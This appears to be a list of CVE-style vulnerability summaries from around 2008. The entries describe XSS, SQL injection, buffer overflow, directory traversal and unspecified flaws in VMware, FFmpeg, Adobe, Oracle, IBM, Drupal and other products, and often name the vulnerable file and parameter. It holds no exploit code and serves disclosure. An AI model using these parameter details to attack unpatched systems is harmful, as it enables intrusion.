Unspecified vulnerability in a guest virtual device driver in VMware Workstation before 5.5.9 build 126128, and 6.5.1 and earlier 6.x versions; VMware Player before 1.0.9 build 126128, and 2.5.1 and earlier 2.x versions; VMware ACE before 1.0.8 build 125922, and 2.5.1 and earlier 2.x versions; VMware Server 1.x before 1.0.8 build 126538 and 2.0.x before 2.0.1 build 156745; VMware Fusion before 2.0.1; VMware ESXi 3.5; and VMware ESX 3.0.2, 3.0.3, and 3.5 allows guest OS users to cause a denial of service (host OS crash) via unknown vectors.
Cross-site scripting (XSS) vulnerability in fichiers/add_url.php in Logz CMS 1.3.1 allows remote attackers to inject arbitrary web script or HTML via the art parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php in Tribiq CMS 5.0.10a, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the template_path parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in bidhistory.php in iTechBids Gold 5.0 allows remote attackers to inject arbitrary web script or HTML via the item_id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
FFmpeg 0.4.9, as used by MPlayer, allows context-dependent attackers to cause a denial of service (memory consumption) via unknown vectors, aka a "Tcp/udp memory leak."
Unspecified vulnerability in the avcodec_close function in libavcodec/utils.c in FFmpeg 0.4.9 before r14787, as used by MPlayer, has unknown impact and attack vectors, related to a free "on random pointers."
Buffer overflow in libavcodec/dca.c in FFmpeg 0.4.9 before r14917, as used by MPlayer, allows context-dependent attackers to have an unknown impact via vectors related to an incorrect DCA_MAX_FRAME_SIZE value.
Multiple buffer overflows in libavformat/utils.c in FFmpeg 0.4.9 before r14715, as used by MPlayer, allow context-dependent attackers to have an unknown impact via vectors related to execution of DTS generation code with a delay greater than MAX_REORDER_DELAY.
Unspecified vulnerability in Adobe ColdFusion 8 and 8.0.1 and ColdFusion MX 7.0.2 allows local users to bypass sandbox restrictions, and obtain sensitive information or possibly gain privileges, via unknown vectors.
Multiple unspecified vulnerabilities in Adobe Flash Player 10.x before 10.0.12.36 and 9.x before 9.0.151.0 allow remote attackers to execute arbitrary code via unknown vectors related to "input validation errors."
Adobe Flash Player 9.0.124.0 and earlier, when a Mozilla browser is used, does not properly interpret jar: URLs, which allows attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in the Flash Player ActiveX control in Adobe Flash Player 9.0.124.0 and earlier on Windows allows attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in Adobe Flash Player 9.0.124.0 and earlier makes it easier for remote attackers to conduct DNS rebinding attacks via unknown vectors.
Unspecified vulnerability in the Download Manager in Adobe Reader 8.1.2 and earlier on Windows allows remote attackers to change Internet Security options on a client machine via unknown vectors.
Unspecified vulnerability in a JavaScript method in Adobe Reader and Acrobat 8.1.2 and earlier, and before 7.1.1, allows remote attackers to execute arbitrary code via unknown vectors, related to an "input validation issue."
Multiple unspecified vulnerabilities in the Profiles search pages in IBM Lotus Connections 2.x before 2.0.1 have unknown impact and attack vectors related to "Active" content.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
IBM Lotus Connections 2.x before 2.0.1 allows attackers to discover passwords via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
IBM Lotus Connections 2.x before 2.0.1 stores the password for the administrative user in the trace.log file, which allows local users to obtain sensitive information by reading this file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in IBM Lotus Connections 2.x before 2.0.1 allow remote attackers to execute arbitrary SQL commands via the sortField parameter to unspecified components.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus Connections 2.x before 2.0.1 allow remote attackers to inject arbitrary web script or HTML via (1) the community title, (2) API input, and vectors related to the (3) Homepage, (4) Blogs, (5) Profiles, (6) Dogear, (7) Activities, and (8) Global Search components.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in Simple PHP Scripts gallery 0.1, 0.3, and 0.4 allows remote attackers to inject arbitrary web script or HTML via the gallery parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in complete.php in Simple PHP Scripts blog 0.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in Arihiro Kurata Kantan WEB Server 1.8 and earlier allows remote attackers to read arbitrary files via unknown vectors.
The node module API in Drupal 5.x before 5.11 allows remote attackers to bypass node validation and have unspecified other impact via unknown vectors related to contributed modules.
The user module in Drupal 5.x before 5.11 and 6.x before 6.5 might allow remote authenticated users to bypass intended login access rules and successfully login via unknown vectors.
The core upload module in Drupal 5.x before 5.11 allows remote authenticated users to bypass intended access restrictions and read "files attached to content" via unknown vectors.
SQL injection vulnerability in TLM CMS 3.1 allows remote attackers to execute arbitrary SQL commands via the nom parameter to a-b-membres.php.  NOTE: the goodies.php vector is already covered by CVE-2007-4808.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unrestricted file upload vulnerability in the DownloadsPlus module in PHP-Nuke allows remote attackers to execute arbitrary code by uploading a file with (1) .htm, (2) .html, or (3) .txt extensions, then accessing it via a direct request to the file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: it is unclear how allowing the upload of .html or .txt files supports arbitrary code execution; this might be legitimate functionality.
SQL injection vulnerability in member.php in Oxygen Bulletin Board 1.1.3 allows remote attackers to execute arbitrary SQL commands via the member parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in includes/htmlArea/plugins/HtmlTidy/html-tidy-logic.php in Kayako eSupport 3.20.2 allows remote attackers to inject arbitrary web script or HTML via the jsMakeSrc parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: this issue is probably in the HTMLArea HTMLTidy (HTML Tidy) plugin, not eSupport.
Unspecified vulnerability in the search feature in Sun Java System LDAP JDK before 4.20 allows context-dependent attackers to obtain sensitive information via unknown attack vectors related to the LDAP JDK library.
Multiple unspecified vulnerabilities in YaCy before 0.61 have unknown impact and attack vectors.
Multiple cross-site scripting (XSS) vulnerabilities in Google Chrome 0.2.149.30 allow remote attackers to inject arbitrary web script or HTML via an ftp:// URL for an HTML document within a (1) JPG, (2) PDF, or (3) TXT file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in Mozilla Firefox 3.0.1 through 3.0.3 allow remote attackers to inject arbitrary web script or HTML via an ftp:// URL for an HTML document within a (1) JPG, (2) PDF, or (3) TXT file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Sun Integrated Lights-Out Manager (ILOM) 2.0.1.5 through 2.0.4.26 allows remote authenticated users to (1) access the service processor (SP) and cause a denial of service (shutdown or reboot), or (2) access the host operating system and have an unspecified impact, via unknown vectors.
SQL injection vulnerability in admin.php in Libera CMS 1.12, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the libera_staff_user cookie parameter, a different vector than CVE-2008-4700.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The Native Managed Provider for .NET component in IBM DB2 8 before FP17, 9.1 before FP6, and 9.5 before FP2, when a definer cannot maintain objects, preserves views and triggers without marking them inoperative or dropping them, which has unknown impact and attack vectors.
Unspecified vulnerability in the SQLNLS_UNPADDEDCHARLEN function in the New Compiler (aka Starburst derived compiler) component in the server in IBM DB2 9.1 before FP6 allows attackers to cause a denial of service (segmentation violation and trap) via unknown vectors.
wtap.c in Wireshark 0.99.7 through 1.0.3 allows remote attackers to cause a denial of service (application abort) via a malformed Tamos CommView capture file (aka .ncf file) with an "unknown/unexpected packet type" that triggers a failed assertion.
Unspecified vulnerability in the Bluetooth RFCOMM dissector in Wireshark 0.99.7 through 1.0.3 allows remote attackers to cause a denial of service (application crash or abort) via unknown packets.
Unspecified vulnerability in Citrix XenApp (formerly Presentation Server) 4.5 Feature Pack 1 and earlier, Presentation Server 4.0, and Access Essentials 1.0, 1.5, and 2.0 allows local users to gain privileges via unknown attack vectors related to creating an unspecified file.  NOTE: this might be the same issue as CVE-2008-3485, but the vendor advisory is too vague to be certain.
Cross-site scripting (XSS) vulnerability in search_results.php in buymyscripts Lyrics Script allows remote attackers to inject arbitrary web script or HTML via the k parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in search.php in Ed Pudol Clickbank Portal allows remote attackers to inject arbitrary web script or HTML via the search box.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in search.php in Dan Fletcher Recipe Script allows remote attackers to inject arbitrary web script or HTML via the keyword parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in cpCommerce before 1.2.4 allows remote attackers to inject arbitrary web script or HTML via unknown vectors in the advanced search feature.  NOTE: this is probably a variant of CVE-2008-4121.
Unspecified vulnerability in Hisanaga Electric Co, Ltd. hisa_cart 1.29 and earlier, a module for XOOPS, allows remote attackers to obtain sensitive user information via unknown vectors.
Cross-site scripting (XSS) vulnerability in Movable Type 4 through 4.21 allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to the administrative page, a different vulnerability than CVE-2008-4079.
Multiple unspecified vulnerabilities in Midgard Components (MidCOM) Framework before 8.09.1 have unknown impact and attack vectors.
Unspecified vulnerability in i_utils.asp in PortalApp before 4.01a has unknown impact and attack vectors.
Multiple unspecified vulnerabilities in Slaytanic Scripts Content Plus 2.1.1 have unknown impact and remote attack vectors.
Unspecified vulnerability in the SNMPv3 component in Linksys WAP4400N firmware 1.2.14 on the Marvell Semiconductor 88W8361P-BEM1 chipset has unknown impact and attack vectors, probably remote.
Cross-site scripting (XSS) vulnerability in Kantan WEB Server 1.8 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Unspecified vulnerability in IBM Lotus Quickr 8.1 before Fix pack 1 (8.1.0.1) allows editors to delete pages that were created by a different author via unknown vectors.
Unspecified vulnerability in IBM Lotus Quickr 8.1 before Fix pack 1 (8.1.0.1) allows a place manager to "demote or delete a place superuser group" via unknown vectors.
Heap-based buffer overflow in Mplayer.exe in Herosoft Inc. Hero DVD Player 3.0.8 allows user-assisted remote attackers to execute arbitrary code via an M3u file with a "long entry." NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in ap-save.php in Atarone CMS 1.2.0 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the theme_chosen parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in ap-pages.php in Atarone CMS 1.2.0 allows remote attackers to inject arbitrary web script or HTML via the (1) name and (2) id parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in ap-save.php in Atarone CMS 1.2.0 allows remote attackers to execute arbitrary SQL commands via the (1) site_name, (2) email, (3) theme_chosen, (4) hp, (5) c_meta, (6) id, and (7) c_js parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in EKINdesigns MySQL Quick Admin 1.5.5 allows remote attackers to read and execute arbitrary files via a .. (dot dot) in the lang parameter to actions.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in adodb.php in XAMPP for Windows 1.6.8 allows remote attackers to inject arbitrary web script or HTML via the (1) dbserver, (2) host, (3) user, (4) password, (5) database, and (6) table parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in admin/bin/patch.php in MartinWood Datafeed Studio before 1.6.3 allows remote attackers to execute arbitrary PHP code via a URL in the INSTALL_FOLDER parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in search.php in Datafeed Studio 1.6.2 allows remote attackers to inject arbitrary web script or HTML via the q parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in Domain Group Network GooCMS 1.02 allows remote attackers to inject arbitrary web script or HTML via the s parameter in a comments action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in DCE in HP HP-UX B.11.11, B.11.23, and B.11.31 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in the kernel in HP HP-UX B.11.31 allows local users to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Service Manager (HPSM) before 7.01.71 allows remote authenticated users to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP System Management Homepage (SMH) 2.2.6 and earlier on HP-UX B.11.11 and B.11.23, and SMH 2.2.6 and 2.2.8 and earlier on HP-UX B.11.23 and B.11.31, allows local users to gain "unauthorized access" via unknown vectors, possibly related to temporary file permissions.
Unspecified vulnerability in the Simba MDrmSap ActiveX control in mdrmsap.dll in SAP SAPgui allows remote attackers to execute arbitrary code via unknown vectors involving instantiation by Internet Explorer.
Cross-site scripting (XSS) vulnerability in search.php in Siteman 1.1.11 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in class/theme.class.php in SPAW Editor PHP Edition before 2.0.8.1 has unknown impact and attack vectors, probably related to directory traversal sequences in the theme name.
Unspecified vulnerability in the Java Administration GUI (jnbSA) in Symantec Veritas NetBackup Server and NetBackup Enterprise Server 5.1 before MP7, 6.0 before MP7, and 6.5 before 6.5.2 allows remote authenticated users to gain privileges via unknown attack vectors related to "bpjava* binaries."
Cross-site scripting (XSS) vulnerability in Bitweaver 2.0.2 allows remote attackers to inject arbitrary web script or HTML via the URL parameter to (1) edit.php and (2) list.php in articles/; (3) list_blogs.php and (4) rankings.php in blogs/; (5) calendar/index.php; (6) calendar.php, (7) index.php, and (8) list_events.php in events/; (9) index.php and (10) list_galleries.php in fisheye/; (11) liberty/list_content.php; (12) newsletters/edition.php; (13) pigeonholes/list.php; (14) recommends/index.php; (15) rss/index.php; (16) stars/index.php; (17) users/remind_password.php; (18) wiki/orphan_pages.php; and (19) stats/index.php, different vectors than CVE-2007-0526 and CVE-2005-4379.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in enscript before 1.6.4 has unknown impact and attack vectors, possibly related to the font escape sequence.
Unspecified vulnerability in Opera before 9.52 on Windows, when registered as a protocol handler, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors in which Opera is launched by other applications.
Opera before 9.52 does not check the CRL override upon encountering a certificate that lacks a CRL, which has unknown impact and attack vectors.  NOTE: it is not clear whether this is a vulnerability, but the vendor included it in a security section of the advisory.
Directory traversal vulnerability in VMWare ESXi 3.5 before ESXe350-200810401-O-UG and ESX 3.5 before ESX350-200810201-UG allows administrators with the Datastore.FileManagement privilege to gain privileges via unknown vectors.
Unspecified vulnerability in OSADS Alliance Database before 2.1 has unknown impact and attack vectors, possibly related to includes/functions.php, a different issue than CVE-2006-2874.
Unspecified vulnerability in the TYPO3 Secure Directory (kw_secdir) extension before 1.0.2 allows remote attackers to execute arbitrary code via unknown vectors related to "injection of control characters."
SQL injection vulnerability in index.php in webCMS Portal Edition allows remote attackers to execute arbitrary SQL commands via the id_doc parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in webCMS Portal Edition allows remote attackers to inject arbitrary web script or HTML via the patron parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in ISC BIND 9.3.5-P2-W1, 9.4.2-P2-W1, and 9.5.0-P2-W1 on Windows allows remote attackers to cause a denial of service (UDP client handler termination) via unknown vectors.
Unspecified vulnerability in the UFS module in Sun Solaris 8 through 10 and OpenSolaris allows local users to cause a denial of service (NULL pointer dereference and kernel panic) via unknown vectors related to the Solaris Access Control List (ACL) implementation.
Stack-based buffer overflow in the VSFlexGrid.VSFlexGridL ActiveX control in ComponentOne VSFlexGrid 7.0.1.151 and 8.0.20072.239 allows remote attackers to execute arbitrary code via a long first argument to the Archive method.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Servlet Engine/Web Container in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.31 and 6.1 before 6.1.0.19, when the FileServing feature is enabled, has unknown impact and attack vectors.
Multiple unspecified vulnerabilities in the Importer in Flip4Mac WMV before 2.2.1 have unknown impact and attack vectors, different vulnerabilities than CVE-2007-6713.
Unspecified vulnerability in Objective Development Sharity 3 before 3.5 has unknown impact and attack vectors, related to a "serious security problem."
Cross-site scripting (XSS) vulnerability in admin/login.php in Matterdaddy Market 1.1 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in surveyresults.asp in Smart Survey 1.0 allows remote attackers to inject arbitrary web script or HTML via the sid parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the OC4J component in Oracle Application Server 10.1.2.3 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Collaborative Workspaces component in Oracle Collaboration Suite 10.1.2 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle BPEL Process Manager component in Oracle Application Server allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, and 8.1 SP6 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the WebLogic Workshop component in BEA Product Suite WLW 8.1SP5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to "some NetUI pageflows."
Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, and 9.0 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the WebLogic Workshop component in BEA Product Suite 10.3, 10.2, 10.0 MP1, 9.2 MP3, and 8.1 SP6 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to "some NetUI tags."
Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 9.1, when configuring multiple authorizers, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
Unspecified vulnerability in the PeopleSoft Enterprise Components component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.9.18 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.1.0.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Application Express component in Oracle Database 11.1.0.6 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the JDE EnterpriseOne Business Service Server component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.97.2.2 and 8.98.0.1 allows local users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.48.18 and 8.49.14 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.48.18 and 8.49.14 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise Portal component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne EP 8.9 and EP 9.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.48.18 and 8.49.14 allows remote attackers to affect confidentiality and integrity via unknown vectors.  NOTE: the previous information was obtained from the Oracle October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue allows bypass of the lockout mechanism using brute force guessing of credentials and a response discrepancy information leak when the password is correct.
Unspecified vulnerability in the Oracle iStore component in Oracle E-Business Suite 12.0.4 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 11.5.10.2 and 12.0.4 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the iSupplier Portal component in Oracle E-Business Suite 11.5.10.2 and 12.0.4 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Discoverer Desktop component in Oracle Application Server 10.1.2.3 allows local users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Discoverer Administrator component in Oracle Application Server 9.0.4.3 and 10.1.2.2 allows local users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Applications Technology Stack component in Oracle E-Business Suite 12.0.4 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.1.0.1 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Upgrade component in Oracle Database 10.1.0.5 and 10.2.0.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Spatial component in Oracle Database 10.1.0.5 and 10.2.0.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.  NOTE: the previous information was obtained from the January 2009 CPU.  Oracle has not commented on reliable researcher claims that this issue is a SQL injection vulnerability that allows remote authenticated users to gain MDSYS privileges via the MDSYS.SDO_TOPO_DROP_FTBL trigger.
Unspecified vulnerability in the Oracle Spatial component in Oracle Database 10.1.0.5 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Portal component in Oracle Application Server 9.0.4.3 and 10.1.2.3 allows remote attackers to affect integrity via unknown vectors, a different vulnerability than CVE-2008-3975.
Unspecified vulnerability in the Oracle Spatial component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2009-3413 and CVE-2009-3414.
Unspecified vulnerability in the Oracle Portal component in Oracle Application Server 9.0.4.3 and 10.1.2.3 allows remote attackers to affect integrity via unknown vectors, a different vulnerability than CVE-2008-3977.
Unspecified vulnerability in the SQL*Plus Windows GUI component in Oracle Database allows local users to affect confidentiality via unknown vectors.
Multiple unspecified vulnerabilities in BitlBee before 1.2.3 allow remote attackers to "overwrite" and "hijack" existing accounts via unknown vectors related to "inconsistent handling of the USTATUS_IDENTIFIED state." NOTE: this issue exists because of an incomplete fix for CVE-2008-3920.
moderation.php in MyBB (aka MyBulletinBoard) before 1.4.1 does not properly check for moderator privileges, which has unknown impact and remote attack vectors.
The Microsoft Windows Image Acquisition Logger ActiveX control allows remote attackers to force the download of arbitrary files onto a client system via a URL in the first argument to the Open method, in conjunction with a full destination pathname in the first argument to the Save method.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in index.php in Ovidentia 6.6.5 allows remote attackers to execute arbitrary SQL commands via the field parameter in a search action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in nfsd in the Linux kernel before 2.6.26.4, when NFSv4 is enabled, allows remote attackers to have an unknown impact via vectors related to decoding an NFSv4 acl.
Multiple unspecified vulnerabilities in ClamAV before 0.94 have unknown impact and attack vectors related to file descriptor leaks on the "error path" in (1) libclamav/others.c and (2) libclamav/sis.c.
Multiple cross-site scripting (XSS) vulnerabilities (1) in the WYSIWYG editors, (2) during local group creation, (3) during HTML redirects, (4) in the HTML import, (5) in the Rich text editor, and (6) in link-page in IBM Lotus Quickr 8.1 services for Lotus Domino before Hotfix 15 allow remote attackers to inject arbitrary web script or HTML via unknown vectors, including (7) the Imported Page.  NOTE: the vulnerability in the WYSIWYG editors may exist because of an incomplete fix for CVE-2008-2163.
The routine infrastructure component in IBM DB2 8 before FP17, 9.1 before FP5, and 9.5 before FP1 on Unix and Linux does not change the ownership of the db2fmp process, which has unknown impact and attack vectors.
Unspecified vulnerability in the CLR stored procedure deployment from IBM Database Add-Ins for Visual Studio in the Visual Studio Net component in IBM DB2 9.1 before Fixpak 5 and 9.5 before Fixpak 2 allows remote authenticated users to execute arbitrary code via unknown vectors.
Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact.  NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points.  As of 20080827, no unofficial distributions of this software are known.
The nsXMLDocument::OnChannelRedirect function in Mozilla Firefox before 2.0.0.17, Thunderbird before 2.0.0.17, and SeaMonkey before 1.1.12 allows remote attackers to bypass the Same Origin Policy and execute arbitrary JavaScript code via unknown vectors.
Unspecified vulnerability in the condor_ schedd daemon in Condor before 7.0.5 allows attackers to cause a denial of service (crash) via unknown vectors.
Stack-based buffer overflow in the condor_ schedd daemon in Condor before 7.0.5 allows attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in Condor before 7.0.5 allows attackers to execute jobs as other users via unknown vectors.
Unspecified vulnerability in Cisco Adaptive Security Appliances (ASA) 5500 Series and PIX Security Appliances 7.0 before 7.0(8)3, 7.1 before 7.1(2)78, 7.2 before 7.2(4)16, 8.0 before 8.0(4)6, and 8.1 before 8.1(1)13, when configured as a VPN using Microsoft Windows NT Domain authentication, allows remote attackers to bypass VPN authentication via unknown vectors.
Buffer overflow in Ipswitch WS_FTP Home client allows remote FTP servers to have an unknown impact via a long "message response."
Cross-site request forgery (CSRF) vulnerability in ajax/UpdateCheck.php in Vanilla 1.1.4 and earlier has unknown impact and remote attack vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in forms in Drupal 6.x before 6.4 allow remote attackers to perform unspecified actions via unknown vectors, related to improper token validation for (1) cached forms and (2) forms with AHAH elements.
Unspecified vulnerability in (1) System Consultants La!Cooda WIZ 1.4.0 and earlier and (2) SpaceTag LacoodaST 2.1.3 and earlier allows remote attackers to execute arbitrary PHP scripts, and delete files, read files, and possibly have unknown other impact.
SQL injection vulnerability in forum/neu.asp in fipsCMS 2.1 allows remote attackers to execute arbitrary SQL commands via the kat parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the OpenProcess function in VMware Workstation 5.5.x before 5.5.8 build 108000, VMware Workstation 6.0.x before 6.0.5 build 109488, VMware Player 1.x before 1.0.8 build 108000, VMware Player 2.x before 2.0.5 build 109488, VMware ACE 1.x before 1.0.7 build 108880, VMware ACE 2.x before 2.0.5 build 109488, and VMware Server before 1.0.7 build 108231 on Windows allows local host OS users to gain privileges on the host OS via unknown vectors.
Unspecified vulnerability in a certain ActiveX control in VMware Workstation 5.5.x before 5.5.8 build 108000, VMware Workstation 6.0.x before 6.0.5 build 109488, VMware Player 1.x before 1.0.8 build 108000, VMware Player 2.x before 2.0.5 build 109488, VMware ACE 1.x before 1.0.7 build 108880, VMware ACE 2.x before 2.0.5 build 109488, and VMware Server before 1.0.7 build 108231 has unknown impact and remote attack vectors, a different vulnerability than CVE-2008-3691, CVE-2008-3692, CVE-2008-3693, CVE-2008-3694, and CVE-2008-3695.
Unspecified vulnerability in a certain ActiveX control in VMware Workstation 5.5.x before 5.5.8 build 108000, VMware Workstation 6.0.x before 6.0.5 build 109488, VMware Player 1.x before 1.0.8 build 108000, VMware Player 2.x before 2.0.5 build 109488, VMware ACE 1.x before 1.0.7 build 108880, VMware ACE 2.x before 2.0.5 build 109488, and VMware Server before 1.0.7 build 108231 has unknown impact and remote attack vectors, a different vulnerability than CVE-2008-3691, CVE-2008-3692, CVE-2008-3693, CVE-2008-3694, and CVE-2008-3696.
Unspecified vulnerability in a certain ActiveX control in VMware Workstation 5.5.x before 5.5.8 build 108000, VMware Workstation 6.0.x before 6.0.5 build 109488, VMware Player 1.x before 1.0.8 build 108000, VMware Player 2.x before 2.0.5 build 109488, VMware ACE 1.x before 1.0.7 build 108880, VMware ACE 2.x before 2.0.5 build 109488, and VMware Server before 1.0.7 build 108231 has unknown impact and remote attack vectors, a different vulnerability than CVE-2008-3691, CVE-2008-3692, CVE-2008-3693, CVE-2008-3695, and CVE-2008-3696.
Unspecified vulnerability in a certain ActiveX control in VMware Workstation 5.5.x before 5.5.8 build 108000, VMware Workstation 6.0.x before 6.0.5 build 109488, VMware Player 1.x before 1.0.8 build 108000, VMware Player 2.x before 2.0.5 build 109488, VMware ACE 1.x before 1.0.7 build 108880, VMware ACE 2.x before 2.0.5 build 109488, and VMware Server before 1.0.7 build 108231 has unknown impact and remote attack vectors, a different vulnerability than CVE-2008-3691, CVE-2008-3692, CVE-2008-3694, CVE-2008-3695, and CVE-2008-3696.
